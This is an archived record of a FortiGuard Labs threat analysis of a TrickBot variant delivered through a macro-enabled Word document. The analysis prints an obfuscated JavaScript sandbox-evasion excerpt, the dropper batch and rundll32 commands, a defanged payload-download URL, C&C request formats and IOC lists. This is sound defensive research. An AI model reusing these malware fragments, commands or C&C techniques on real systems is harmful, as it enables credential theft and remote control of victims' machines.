{
	"id": "c74a134b-4888-4aea-aad4-f828541c65d9",
	"created_at": "2026-04-06T00:18:30.071472Z",
	"updated_at": "2026-04-10T13:11:38.195678Z",
	"deleted_at": null,
	"sha1_hash": "9c931ae1f11b918d1ae7a3540ffa3c6446ffdefa",
	"title": "New Variant of TrickBot Being Spread by Word Document | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1613278,
	"plain_text": "New Variant of TrickBot Being Spread by Word Document | FortiGuard\r\nLabs\r\nBy Xiaopeng Zhang\r\nPublished: 2020-03-09 · Archived: 2026-04-05 22:34:06 UTC\r\nFortiGuard Labs Threat Analysis Report\r\nAffected platforms:     Windows\r\nImpacted parties:        Online banking users \r\nImpact:                        Collects sensitive information and controls victims’ computers\r\nSeverity level:             High\r\nTrickBot is a malware family first captured by FortiGuard Labs and then analyzed by me back in 2016. TrickBot is a\r\nmodule-based malware, which means it can extend its functionalities by downloading new modules from its C\u0026C server and\r\nexecuting them on its victim’s device. While it was initially identified as banking Trojan, it has gradually extended its\r\nfunctionalities to collect credentials from its victims’ email accounts, browsers, installed network apps, and so on. It is also\r\nable to send spam to its victim’s email contacts , as well as deliver other malware to the victim’s device, such as Emotet.\r\nRecently, FortiGuard Labs captured an MS Office Word sample in the wild that is spreading a new variant of TrickBot. I did\r\nan analysis on this sample file, and in this post I will explain how it works on the victim’s machine.\r\nAnalyzing the Word Document\r\nWhen the malicious Word document is opened with MS Office Word, it requests input, as shown in Figure 1, by asking the\r\nvictim to click the “Enable Content” button to enable the document’s Macro feature. Once this is done, its malicious Macro\r\n(VBA code) is executed.\r\nFigure 1. Word document content\r\nBy going to the Menu “Developer”-\u003e “Visual Basic” we can check out the Macro’s VBA modules and code. The Macro\r\nproject is password-protected, so we cannot see any of the detailed information until we provide the correct password.\r\nFortunately, there is a way to bypass this protection by modifying its binary file. \r\nThe Word document was built on a Chess-related project named “ChessBrainVBA.” You can see the form of the Chess\r\nproject in Figure 2.\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html\r\nPage 1 of 12\n\nFigure 2. Content of ChessBrainVBA project\r\nOn the form there is a Label control containing the malicious JS code, outlined with a red rectangle. \r\nOne of the VBA modules has an autorun() function that is called automatically when the Word document opens. The VBA\r\ncode then extracts two files onto the victim’s system. \r\nOne file is “C:\\AprilReport\\LogsTsg\\LogsTsg7\\LogsTsg8\\List1.bat”, with content “cscript //nologo\r\nC:\\AprilReport\\List1.jse”, and the other is “C:\\AprilReport\\List1.jse”, with JavaScript code from the Label control in Figure\r\n2, which is a huge obfuscated JavaScript code. It then starts the first extracted file “List1.bat”, which calls “cscript” running\r\nthe huge JavaScript file “List1.jse”.\r\nAnti-Analysis Applied in JavaScript Code\r\nThe JavaScript code is very heavily obfuscated. This protects the API function calls and constant strings from being\r\nidentified. They also use a lot of anonymous functions.\r\nWhen the code starts, it first waits around one minute to bypass any auto-analysis tools by seeming to be inert.\r\nAfter waiting, it then executes the command \"Select * from Win32_Process\" to obtain all running processes. It then puts all\r\nof the names of these obtained processes together and checks to see if its length is less than 3100. If so, it will raise an\r\nexception and close. Usually, on a real computer, this length is larger than 3100. In this measure, it is better able to bypass\r\nmany auto-analysis systems, including Sandboxes and Virtual Machines.\r\nThe following code snippet shows the code used to process name length checking:\r\nif (msdgnwould99[var001] \u003c 3100 \u0026\u0026 msdgnMarch16)     {            this[(function(unwask5) {\r\n                unwask5[Tvif_rt] = 3;\r\n                unwask5[Tvif_rt - 6] = 83;\r\n                return nSjWorb(nSjWorbEx() + (unwask5[60] - unwask5[Tvif_rt]), 'f');\r\n            })(Dikrt, null, true, 'andall4') + (function(fhhreme3) {\r\n                fhhreme3[Tvif_rt] = 0;\r\n                fhhreme3[Tvif_rt - 6] = 111;\r\n                return nSjWorb(nSjWorbEx() + (fhhreme3[60] - fhhreme3[Tvif_rt]), 'f');\r\n            })(Dikrt) + (function(vjvlike73) {\r\n                vjvlike73[Tvif_rt] = 2;\r\n                vjvlike73[Tvif_rt - 6] = 113;\r\n                return nSjWorb(nSjWorbEx() + (vjvlike73[60] - vjvlike73[Tvif_rt]), 'f');\r\n            })(Dikrt, 'outfit92', 'really69')]((function(kuicur4) {\r\n                kuicur4[Tvif_rt] = 2;\r\n                kuicur4[Tvif_rt - 6] = 78;\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html\r\nPage 2 of 12\n\nreturn nSjWorb(nSjWorbEx() + (kuicur4[60] - kuicur4[Tvif_rt]), 'f');\r\n            })(Dikrt, 'tits24', 2872) + (function(jiqthin4) {\r\n                jiqthin4[Tvif_rt] = 4;\r\n                jiqthin4[Tvif_rt - 6] = 105;\r\n                return nSjWorb(nSjWorbEx() + (jiqthin4[60] - jiqthin4[Tvif_rt]), 'f');\r\n            })(Dikrt, 'nice54', 2910, 'dudes7', 'stop11') + (function(utscust3) {\r\n                utscust3[Tvif_rt] = 3;\r\n                utscust3[Tvif_rt - 6] = 104;\r\n                return nSjWorb(nSjWorbEx() + (utscust3[60] - utscust3[Tvif_rt]), 'f');\r\n            })(Dikrt, null, 'this43', null) + (function(fisth3) {\r\n                fisth3[Tvif_rt] = 3;\r\n                fisth3[Tvif_rt - 6] = 78;\r\n                return nSjWorb(nSjWorbEx() + (fisth3[60] - fisth3[Tvif_rt]), 'f');\r\n            })(Dikrt, 'daughter92', null, 'when24') + (function(fuecusto3) {\r\n                fuecusto3[Tvif_rt] = 1;\r\n                fuecusto3[Tvif_rt - 6] = 118;\r\n                return nSjWorb(nSjWorbEx() + (fuecusto3[60] - fuecusto3[Tvif_rt]), 'f');\r\n            })(Dikrt, 'this43') + (function(jpsaske4) {\r\n                jpsaske4[Tvif_rt] = 3;\r\n                jpsaske4[Tvif_rt - 6] = 113;\r\n                return nSjWorb(nSjWorbEx() + (jpsaske4[60] - jpsaske4[Tvif_rt]), 'f');\r\n            })(Dikrt, 'andall4', true, 'nothin66') + (function(ujnthey3) {\r\n                ujnthey3[Tvif_rt] = 4;\r\n                ujnthey3[Tvif_rt - 6] = 107;\r\n                return nSjWorb(nSjWorbEx() + (ujnthey3[60] - ujnthey3[Tvif_rt]), 'f');\r\n            })(Dikrt, true, 'daughter92', true, true));\r\n        }\r\nTo analyze this JavaScript code, I created some local variables to split the anonymous function result.\r\n“msdgnwould99[var001]” is the length of all process names, where “msdgnwould99” contains all process names,\r\nand  “var001” is a created local variable whose value is “length”.  msdgnMarch16 is a variable with a default value of\r\n“1”. The “if” sub-branch also calls a non-existent function that raises an exception and exits.\r\nDownloading the TrickBot Payload and Maintaining Persistence\r\nThe JavaScript code then downloads a file from its sever. The request looks like this:\r\nhxxps[:]//45[.]138[.]72[.]155/1/1.php?h=m25\u0026j=8b1e7a89\u0026l=Mytest01-PC@@Mytest01-\r\nPC@@Mytest01@@*147[.]2[.]3[.]15%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Desktop%20Adapter\u002612455532\r\nThe parameter portion contains the victim’s computer name, login username, IP address, and network card information. The\r\nserver then replies to this request with a base64 encoded PE file.  Figure 3 shows the received base64 encoded PE file\r\ncontent.\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html\r\nPage 3 of 12\n\nFigure 3. HTTPS request and response with base64 encoded content\r\nThe JavaScript code saves this file into the system’s %temp% folder, and it also copies the current JavaScript file into the\r\nsystem’s %temp% folder as well. Later, it runs the copied JavaScript file from the %temp% folder and exits the current one.\r\nThis time, it checks to see if it runs from the %temp% folder. If yes, it reads the downloaded file and puts its base64-\r\ndecoded content into a file under the %temp% folder, which is “8a1e7a8988168816.com” in my test computer. This file is\r\nthe payload of this variant of TrickBot, which will be started in the JavaScript. I’ll elaborate on this in the next section.\r\nMeanwhile, it copies the JavaScript file into the Windows startup folder so it can start whenever Windows OS starts. In\r\nprevious versions, it used to install itself as a Scheduled Task or be added into the system registry’s Auto-Run group to\r\nmaintain persistence.  \r\nIn Figure 4, you will find it using the Windows Start Menu.\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html\r\nPage 4 of 12\n\nFigure 4. JavaScript file has been added into Startup in Start Menu\r\nStarting Payload of TrickBot\r\nThe downloaded payload file “8a1e7a8988168816.com” is a DLL file that is executed in rundll32.exe, which is a Windows-default program used to run a DLL file as a program, using the command line \"C:\\Windows\\System32\\rundll32.exe\r\nC:\\Users\\{user name}\\AppData\\Local\\Temp\\8a1e7a8988168816.com InitLibrary\".\r\nAs I mentioned above, as well in my previous analysis, TrickBot is a modular Trojan. It is able to download modules (DLL\r\nfiles) from its C\u0026C server, load them into the newly-created process “svchost.exe,” then execute one module in the\r\n“svchost.exe” process.\r\nTrickBot communicates with these modules (svchost.exe) through a named pipe and shared memory by calling API\r\nfunctions like ReadProcessMemory(), WriteProcessMemory() and so on. Once it starts a module in a svchost.exe, it then\r\nstarts a corresponding thread function to continue communicating with the module.\r\nResearchers have found that it has delivered the following modules in the past: systeminfo, injectDll, pwgrab, importDll,\r\nmshareDll, mwormDll, tabDll, vncDll, and so on. I even did some analysis on some of them. From the module name you\r\ncan often guess what the module’s purpose is. I will next explain what the internal code structure of TrickBot is and how it\r\ndownloads those modules.\r\nWhen “8a1e7a8988168816.com” starts in rundll32.exe, its entry function DllMain() is called, which then decrypts and\r\nextracts another executable module (EXE file) into its memory. It then dynamically adjusts some section data, such as\r\nimport table and relocation data. After everything is ready, its entry point function is called. And from then on, all TrickBot\r\ntasks are performed by the extracted module.\r\nThe first time it runs, it creates a home folder named “DirectTools” under the %AppData% folder for saving its\r\nconfiguration settings, future downloaded module files, as well as module configuration files. \r\nThe configuration file of TrickBot is a randomly-chosen-file-name file saved in its home directory. The content is encrypted\r\nand obfuscated. It contains a group tag (“red4” for this variant), client_id (generated with the victim’s computer name), as\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html\r\nPage 5 of 12\n\nwell as the TrickBot version, its C\u0026C server IP address, and Port list information. Figure 5 shows what this saved\r\nconfiguration file looks like. This time, the file name is “revocations.txt”, the red rectangles identify two encrypted data sets,\r\nand the other readable texts are trash data.\r\nFigure 5. The encrypted and obfuscated configuration file\r\nFigure 6 shows the C\u0026C server information that was decrypted in a text editor from the file shown in Figure 5. You can see\r\nthat it contains TrickBot version(1000500), server IP and Port information, and the auto-loaded module “pwgrab”.\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html\r\nPage 6 of 12\n\nFigure 6. Decrypted configuration information\r\nSending Commands to the C\u0026C Server and Downloading Modules\r\nTrickBot has many commands it can use to communicate with its server, whose IP address and Port are randomly chosen\r\nfrom server configuration data shown in Figure 6. Some of the command content is listed below in chronological order to\r\nexplain how they work. \r\nAll the commands are in this format: \r\n/group_ID/Client_ID/command number/other payload information\r\nThe group ID is “red4” and the Client_ID is “Mytest01-PC_W617601.46499EE873EAC4080BFC4E488048CEAA” for my\r\ntest environment.\r\nCommand 5:\r\n\"GET /red4/Mytest01-PC_W617601.46499EE873EAC4080BFC4E488048CEAA/5/spk/\"\r\nThis is the first packet sent to its C\u0026C server.\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html\r\nPage 7 of 12\n\nCommand 0:\r\n\"GET /red4/Mytest01-PC_W617601.46499EE873EAC4080BFC4E488048CEAA/0/Windows\r\n7 x86 SP1/1086/{my global\r\nip}/2203029355927E4792CADE316791C927FFC55D5E56150F111936DFD52481C7D7/sMU2E48oEOgEGkiGss\r\nThis command submits the victim’s system information and global IP address to the C\u0026C server. The response packet\r\ncontains another server IP address and Port list for downloading modules.\r\nCommand 14:\r\n\"GET /red4/Mytest01-\r\nPC_W617601.46499EE873EAC4080BFC4E488048CEAA/14/user/Mytest01/0/\"\r\nThis command submits to the server the victim device’s information, such as Logon User Name, network status, and so on.\r\nCommand 63:\r\n\"POST red4/Mytest01-\r\nPC_W617601.46499EE873EAC4080BFC4E488048CEAA/63/systeminfo/GetSystemInfo/c3VjY2Vzcw==\"\r\nThis command tells the server that the “systeminfo” module was a success. “systeminfo”  was a module (no longer a DLL\r\nfile in this variant) used in other versions to collect system information from the victim’s device and then send it to its\r\nserver. However, in this variant this module is already integrated into TrickBot.\r\nCommand 5:\r\n\"GET /red4/Mytest01-\r\nPC_W617601.46499EE873EAC4080BFC4E488048CEAA/5/pwgrab32/\"\r\nThis command asks the C\u0026C server to send back the module “pwgrab32”. As you may recall back in figure 6, “pwgrab”\r\nwas picked from the decrypted configuration file, where it was set as “autorun”. Therefore, it is the first module to be\r\ndownloaded. My test environment is a 32-bit Windows OS, so the requesting module name is “pwgrab32”, and it is\r\n“pwgrab64” for a 64-bit Windows OS. Note that this command is sent to one server of the server IP and Port list based on\r\nthe response from command 0.\r\n\"GET /red4/Mytest01-PC_W617601.46499EE873EAC4080BFC4E488048CEAA/5/dpost/\"\r\nNext, it sends another command 5 request to download the configuration file for “pwgrab”.\r\nCommand 64:\r\n \"POST red4/Mytest01-\r\nPC_W617601.46499EE873EAC4080BFC4E488048CEAA/64/pwgrab/VERS/browser/\"  \r\nWhen module “pwgrab” runs in svchost.exe, it directly sends stolen data to its C\u0026C server, whose IP address and Port are\r\ndefined in its configuration file (dpost file). Meanwhile, “pwbrab” updates TrickBot with its current status, and TrickBot\r\nthen updates that status to its C\u0026C server by submitting command 64. For this one, it sends pwgrab’s version information.\r\nCommand 23:\r\n \"GET /red4/Mytest01-\r\nPC_W617601.46499EE873EAC4080BFC4E488048CEAA/23/1000499/\"\r\nCommand 23 is used to request up-to-date server configuration data, which overwrites the data shown in Figure 6.  Figure 7\r\nis a screenshot of the up-to-date server configuration, which was just decrypted. The version has now become “1000502”.\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html\r\nPage 8 of 12\n\nFigure 7. Up-to-date server configuration information\r\nCommand 1:\r\n\"GET /red4/Mytest01-\r\nPC_W617601.46499EE873EAC4080BFC4E488048CEAA/1/40sQwU0W2YyUyQuOo/\" \r\nThis command queries the C\u0026C server for tasks. The server can then reply with similar to that below, where you can see the\r\nstring “networkDll start”, which tells TrickBot to start the module “networkDll”.\r\nHere is the response content:\r\n\"/62/red4/Mytest01-\r\nPC_W617601.46499EE873EAC4080BFC4E488048CEAA/bpdTFBvlTHxhZFzpXF1nXF1l/96322307/\\r\\nnetwork\r\nstart\\r\\n\"\r\nTrickBot sends command 5 with “networkDll32” to the C\u0026C server, whose IP address and Port are from command 0’s\r\nresponse, to download it.\r\n\"GET /red4/Mytest01-\r\nPC_W617601.46499EE873EAC4080BFC4E488048CEAA/5/networkDll32/\"\r\nNote: Most of this TrickBot variant’s constant strings that are mentioned in this post, and most data that returned from the\r\nC\u0026C server (like modules), is encrypted. What I have referred to in this post is the decrypted plaintext. The downloaded\r\nmodules and other files are saved in its home directory (“%AppData%\\DirectTools” for this variant). Before they are saved,\r\nthey are all double encrypted. \r\nConclusion\r\nIn this post, we detailed how this TrickBot fresh variant works in a victim's machine, what technologies it uses to perform\r\nanti-analysis, as well as how the payload of TrickBot communicates with its C\u0026C server to download the modules.\r\nTrickBot has been active for years. The server configuration version is now 1000502, compared to the version number when\r\nwe first captured it in 2016, which was 1000004. We think it will keep upgrading itself from time to time.  Since we will\r\ncontinue monitoring it, readers can expect that we will continue to publish new technical analysis and updates whenever a\r\nnew campaign is captured in the future.\r\nSolution\r\nFortinet customers are already protected from this TrickBot variant by FortiGuard’s Web Filtering, AntiVirus, and IPS\r\nservices as follows:\r\nThe downloading URL is rated as \"Malicious Websites\" by the FortiGuard Web Filtering service.\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html\r\nPage 9 of 12\n\nThe Word document and downloaded Dll file are detected as \"VBA/TrickBot.MRVB!tr\" and “W32/TrickBot.EFDC!tr”\r\nand blocked by the FortiGuard AntiVirus service.\r\nThe IP addresses of the C\u0026C server are detected and blocked by the FortiGuard IPS signature “Trojan.TrickBot”.\r\nIOCs:\r\nURLs\r\nhxxps[:]//45[.]138[.]72[.]155/1/1.php?h=m25\u0026j=8b1e7a89\u0026l={…}\r\nTrickBot C\u0026C server IP address and Port list:\r\n\u003csrv\u003e107.175.87.142:443\u003c/srv\u003e\r\n\u003csrv\u003e114.8.133.71:449\u003c/srv\u003e\r\n\u003csrv\u003e119.252.165.75:449\u003c/srv\u003e\r\n\u003csrv\u003e121.100.19.18:449\u003c/srv\u003e\r\n\u003csrv\u003e131.161.253.190:449\u003c/srv\u003e\r\n\u003csrv\u003e146.185.253.161:443\u003c/srv\u003e\r\n\u003csrv\u003e170.84.78.224:449\u003c/srv\u003e\r\n\u003csrv\u003e171.100.142.238:449\u003c/srv\u003e\r\n\u003csrv\u003e180.180.216.177:449\u003c/srv\u003e\r\n\u003csrv\u003e181.112.157.42:449\u003c/srv\u003e\r\n\u003csrv\u003e181.113.28.146:449\u003c/srv\u003e\r\n\u003csrv\u003e181.129.104.139:449\u003c/srv\u003e\r\n\u003csrv\u003e181.129.134.18:449\u003c/srv\u003e\r\n\u003csrv\u003e181.140.173.186:449\u003c/srv\u003e\r\n\u003csrv\u003e181.196.207.202:449\u003c/srv\u003e\r\n\u003csrv\u003e181.196.207.202:449\u003c/srv\u003e\r\n\u003csrv\u003e185.14.29.4:443\u003c/srv\u003e\r\n\u003csrv\u003e185.14.30.209:443\u003c/srv\u003e\r\n\u003csrv\u003e185.14.31.72:443\u003c/srv\u003e\r\n\u003csrv\u003e185.141.27.238:443\u003c/srv\u003e\r\n\u003csrv\u003e185.252.144.190:443\u003c/srv\u003e\r\n\u003csrv\u003e185.62.188.10:443\u003c/srv\u003e\r\n\u003csrv\u003e185.65.202.183:443\u003c/srv\u003e\r\n\u003csrv\u003e185.99.2.202:443\u003c/srv\u003e\r\n\u003csrv\u003e185.99.2.220:443\u003c/srv\u003e\r\n\u003csrv\u003e186.232.91.240:449\u003c/srv\u003e\r\n\u003csrv\u003e186.71.150.23:449\u003c/srv\u003e\r\n\u003csrv\u003e188.165.62.2:443\u003c/srv\u003e\r\n\u003csrv\u003e190.214.13.2:449\u003c/srv\u003e\r\n\u003csrv\u003e192.210.226.106:443\u003c/srv\u003e\r\n\u003csrv\u003e192.3.193.162:443\u003c/srv\u003e\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html\r\nPage 10 of 12\n\n\u003csrv\u003e194.5.250.136:443\u003c/srv\u003e\r\n\u003csrv\u003e194.5.250.166:443\u003c/srv\u003e\r\n\u003csrv\u003e194.5.250.168:443\u003c/srv\u003e\r\n\u003csrv\u003e194.5.250.178:443\u003c/srv\u003e\r\n\u003csrv\u003e194.5.250.179:443\u003c/srv\u003e\r\n\u003csrv\u003e195.2.93.50:443\u003c/srv\u003e\r\n\u003csrv\u003e195.54.32.12:443\u003c/srv\u003e\r\n\u003csrv\u003e198.15.119.121:443\u003c/srv\u003e\r\n\u003csrv\u003e198.15.119.71:443\u003c/srv\u003e\r\n\u003csrv\u003e200.127.121.99:449\u003c/srv\u003e\r\n\u003csrv\u003e200.21.51.38:449\u003c/srv\u003e\r\n\u003csrv\u003e202.29.215.114:449\u003c/srv\u003e\r\n\u003csrv\u003e203.23.128.148:443\u003c/srv\u003e\r\n\u003csrv\u003e212.80.216.181:443\u003c/srv\u003e\r\n\u003csrv\u003e212.80.217.243:443\u003c/srv\u003e\r\n\u003csrv\u003e217.12.209.199:443\u003c/srv\u003e\r\n\u003csrv\u003e31.131.21.30:443\u003c/srv\u003e\r\n\u003csrv\u003e36.89.85.103:449\u003c/srv\u003e\r\n\u003csrv\u003e45.142.213.70:443\u003c/srv\u003e\r\n\u003csrv\u003e45.148.120.153:443\u003c/srv\u003e\r\n\u003csrv\u003e45.93.4.134:443\u003c/srv\u003e\r\n\u003csrv\u003e46.174.235.36:449\u003c/srv\u003e\r\n\u003csrv\u003e5.182.210.120:443\u003c/srv\u003e\r\n\u003csrv\u003e5.182.210.226:443\u003c/srv\u003e\r\n\u003csrv\u003e5.255.96.119:443\u003c/srv\u003e\r\n\u003csrv\u003e5.255.96.153:443\u003c/srv\u003e\r\n\u003csrv\u003e5.34.176.184:443\u003c/srv\u003e\r\n\u003csrv\u003e5.34.177.194:443\u003c/srv\u003e\r\n\u003csrv\u003e51.254.164.244:443\u003c/srv\u003e\r\n\u003csrv\u003e51.89.115.103:443\u003c/srv\u003e\r\n\u003csrv\u003e51.89.115.99:443\u003c/srv\u003e\r\n\u003csrv\u003e62.109.1.7:443\u003c/srv\u003e\r\n\u003csrv\u003e80.87.195.21:443\u003c/srv\u003e\r\n\u003csrv\u003e82.148.16.5:443\u003c/srv\u003e\r\n\u003csrv\u003e85.143.218.249:443\u003c/srv\u003e\r\n\u003csrv\u003e85.204.116.179:443\u003c/srv\u003e\r\n\u003csrv\u003e89.191.234.89:443\u003c/srv\u003e\r\n\u003csrv\u003e89.32.41.126:443\u003c/srv\u003e\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html\r\nPage 11 of 12\n\n\u003csrv\u003e91.235.129.144:443\u003c/srv\u003e\r\n\u003csrv\u003e92.223.93.153:443\u003c/srv\u003e\r\n\u003csrv\u003e93.189.42.66:443\u003c/srv\u003e\r\n\u003csrv\u003e94.156.35.216:443\u003c/srv\u003e\r\nSample SHA-256\r\n[Captured Word document]\r\n533BA6AF6FB6A529AF62B0AF69EFF78DFE2478E8E693CD4FA4A3FEC01570DDFA\r\n[Base64 decoded Dll file or 8a1e7a8988168816.com]\r\n70B3DA66AD99BCA8703EF61D3F8406B3D0B05AD60D10318270F41A064D065791\r\nLearn more about FortiGuard Labs threat research and the FortiGuard Security Subscriptions and Services portfolio. Sign\r\nup for the weekly Threat Brief from FortiGuard Labs. \r\nLearn more about Fortinet’s free cybersecurity training initiative or about the Fortinet Network Security Expert\r\nprogram, Network Security Academy program, and FortiVet program.\r\nSource: https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html"
	],
	"report_names": [
		"new-variant-of-trickbot-being-spread-by-word-document.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434710,
	"ts_updated_at": 1775826698,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9c931ae1f11b918d1ae7a3540ffa3c6446ffdefa.pdf",
		"text": "https://archive.orkl.eu/9c931ae1f11b918d1ae7a3540ffa3c6446ffdefa.txt",
		"img": "https://archive.orkl.eu/9c931ae1f11b918d1ae7a3540ffa3c6446ffdefa.jpg"
	}
}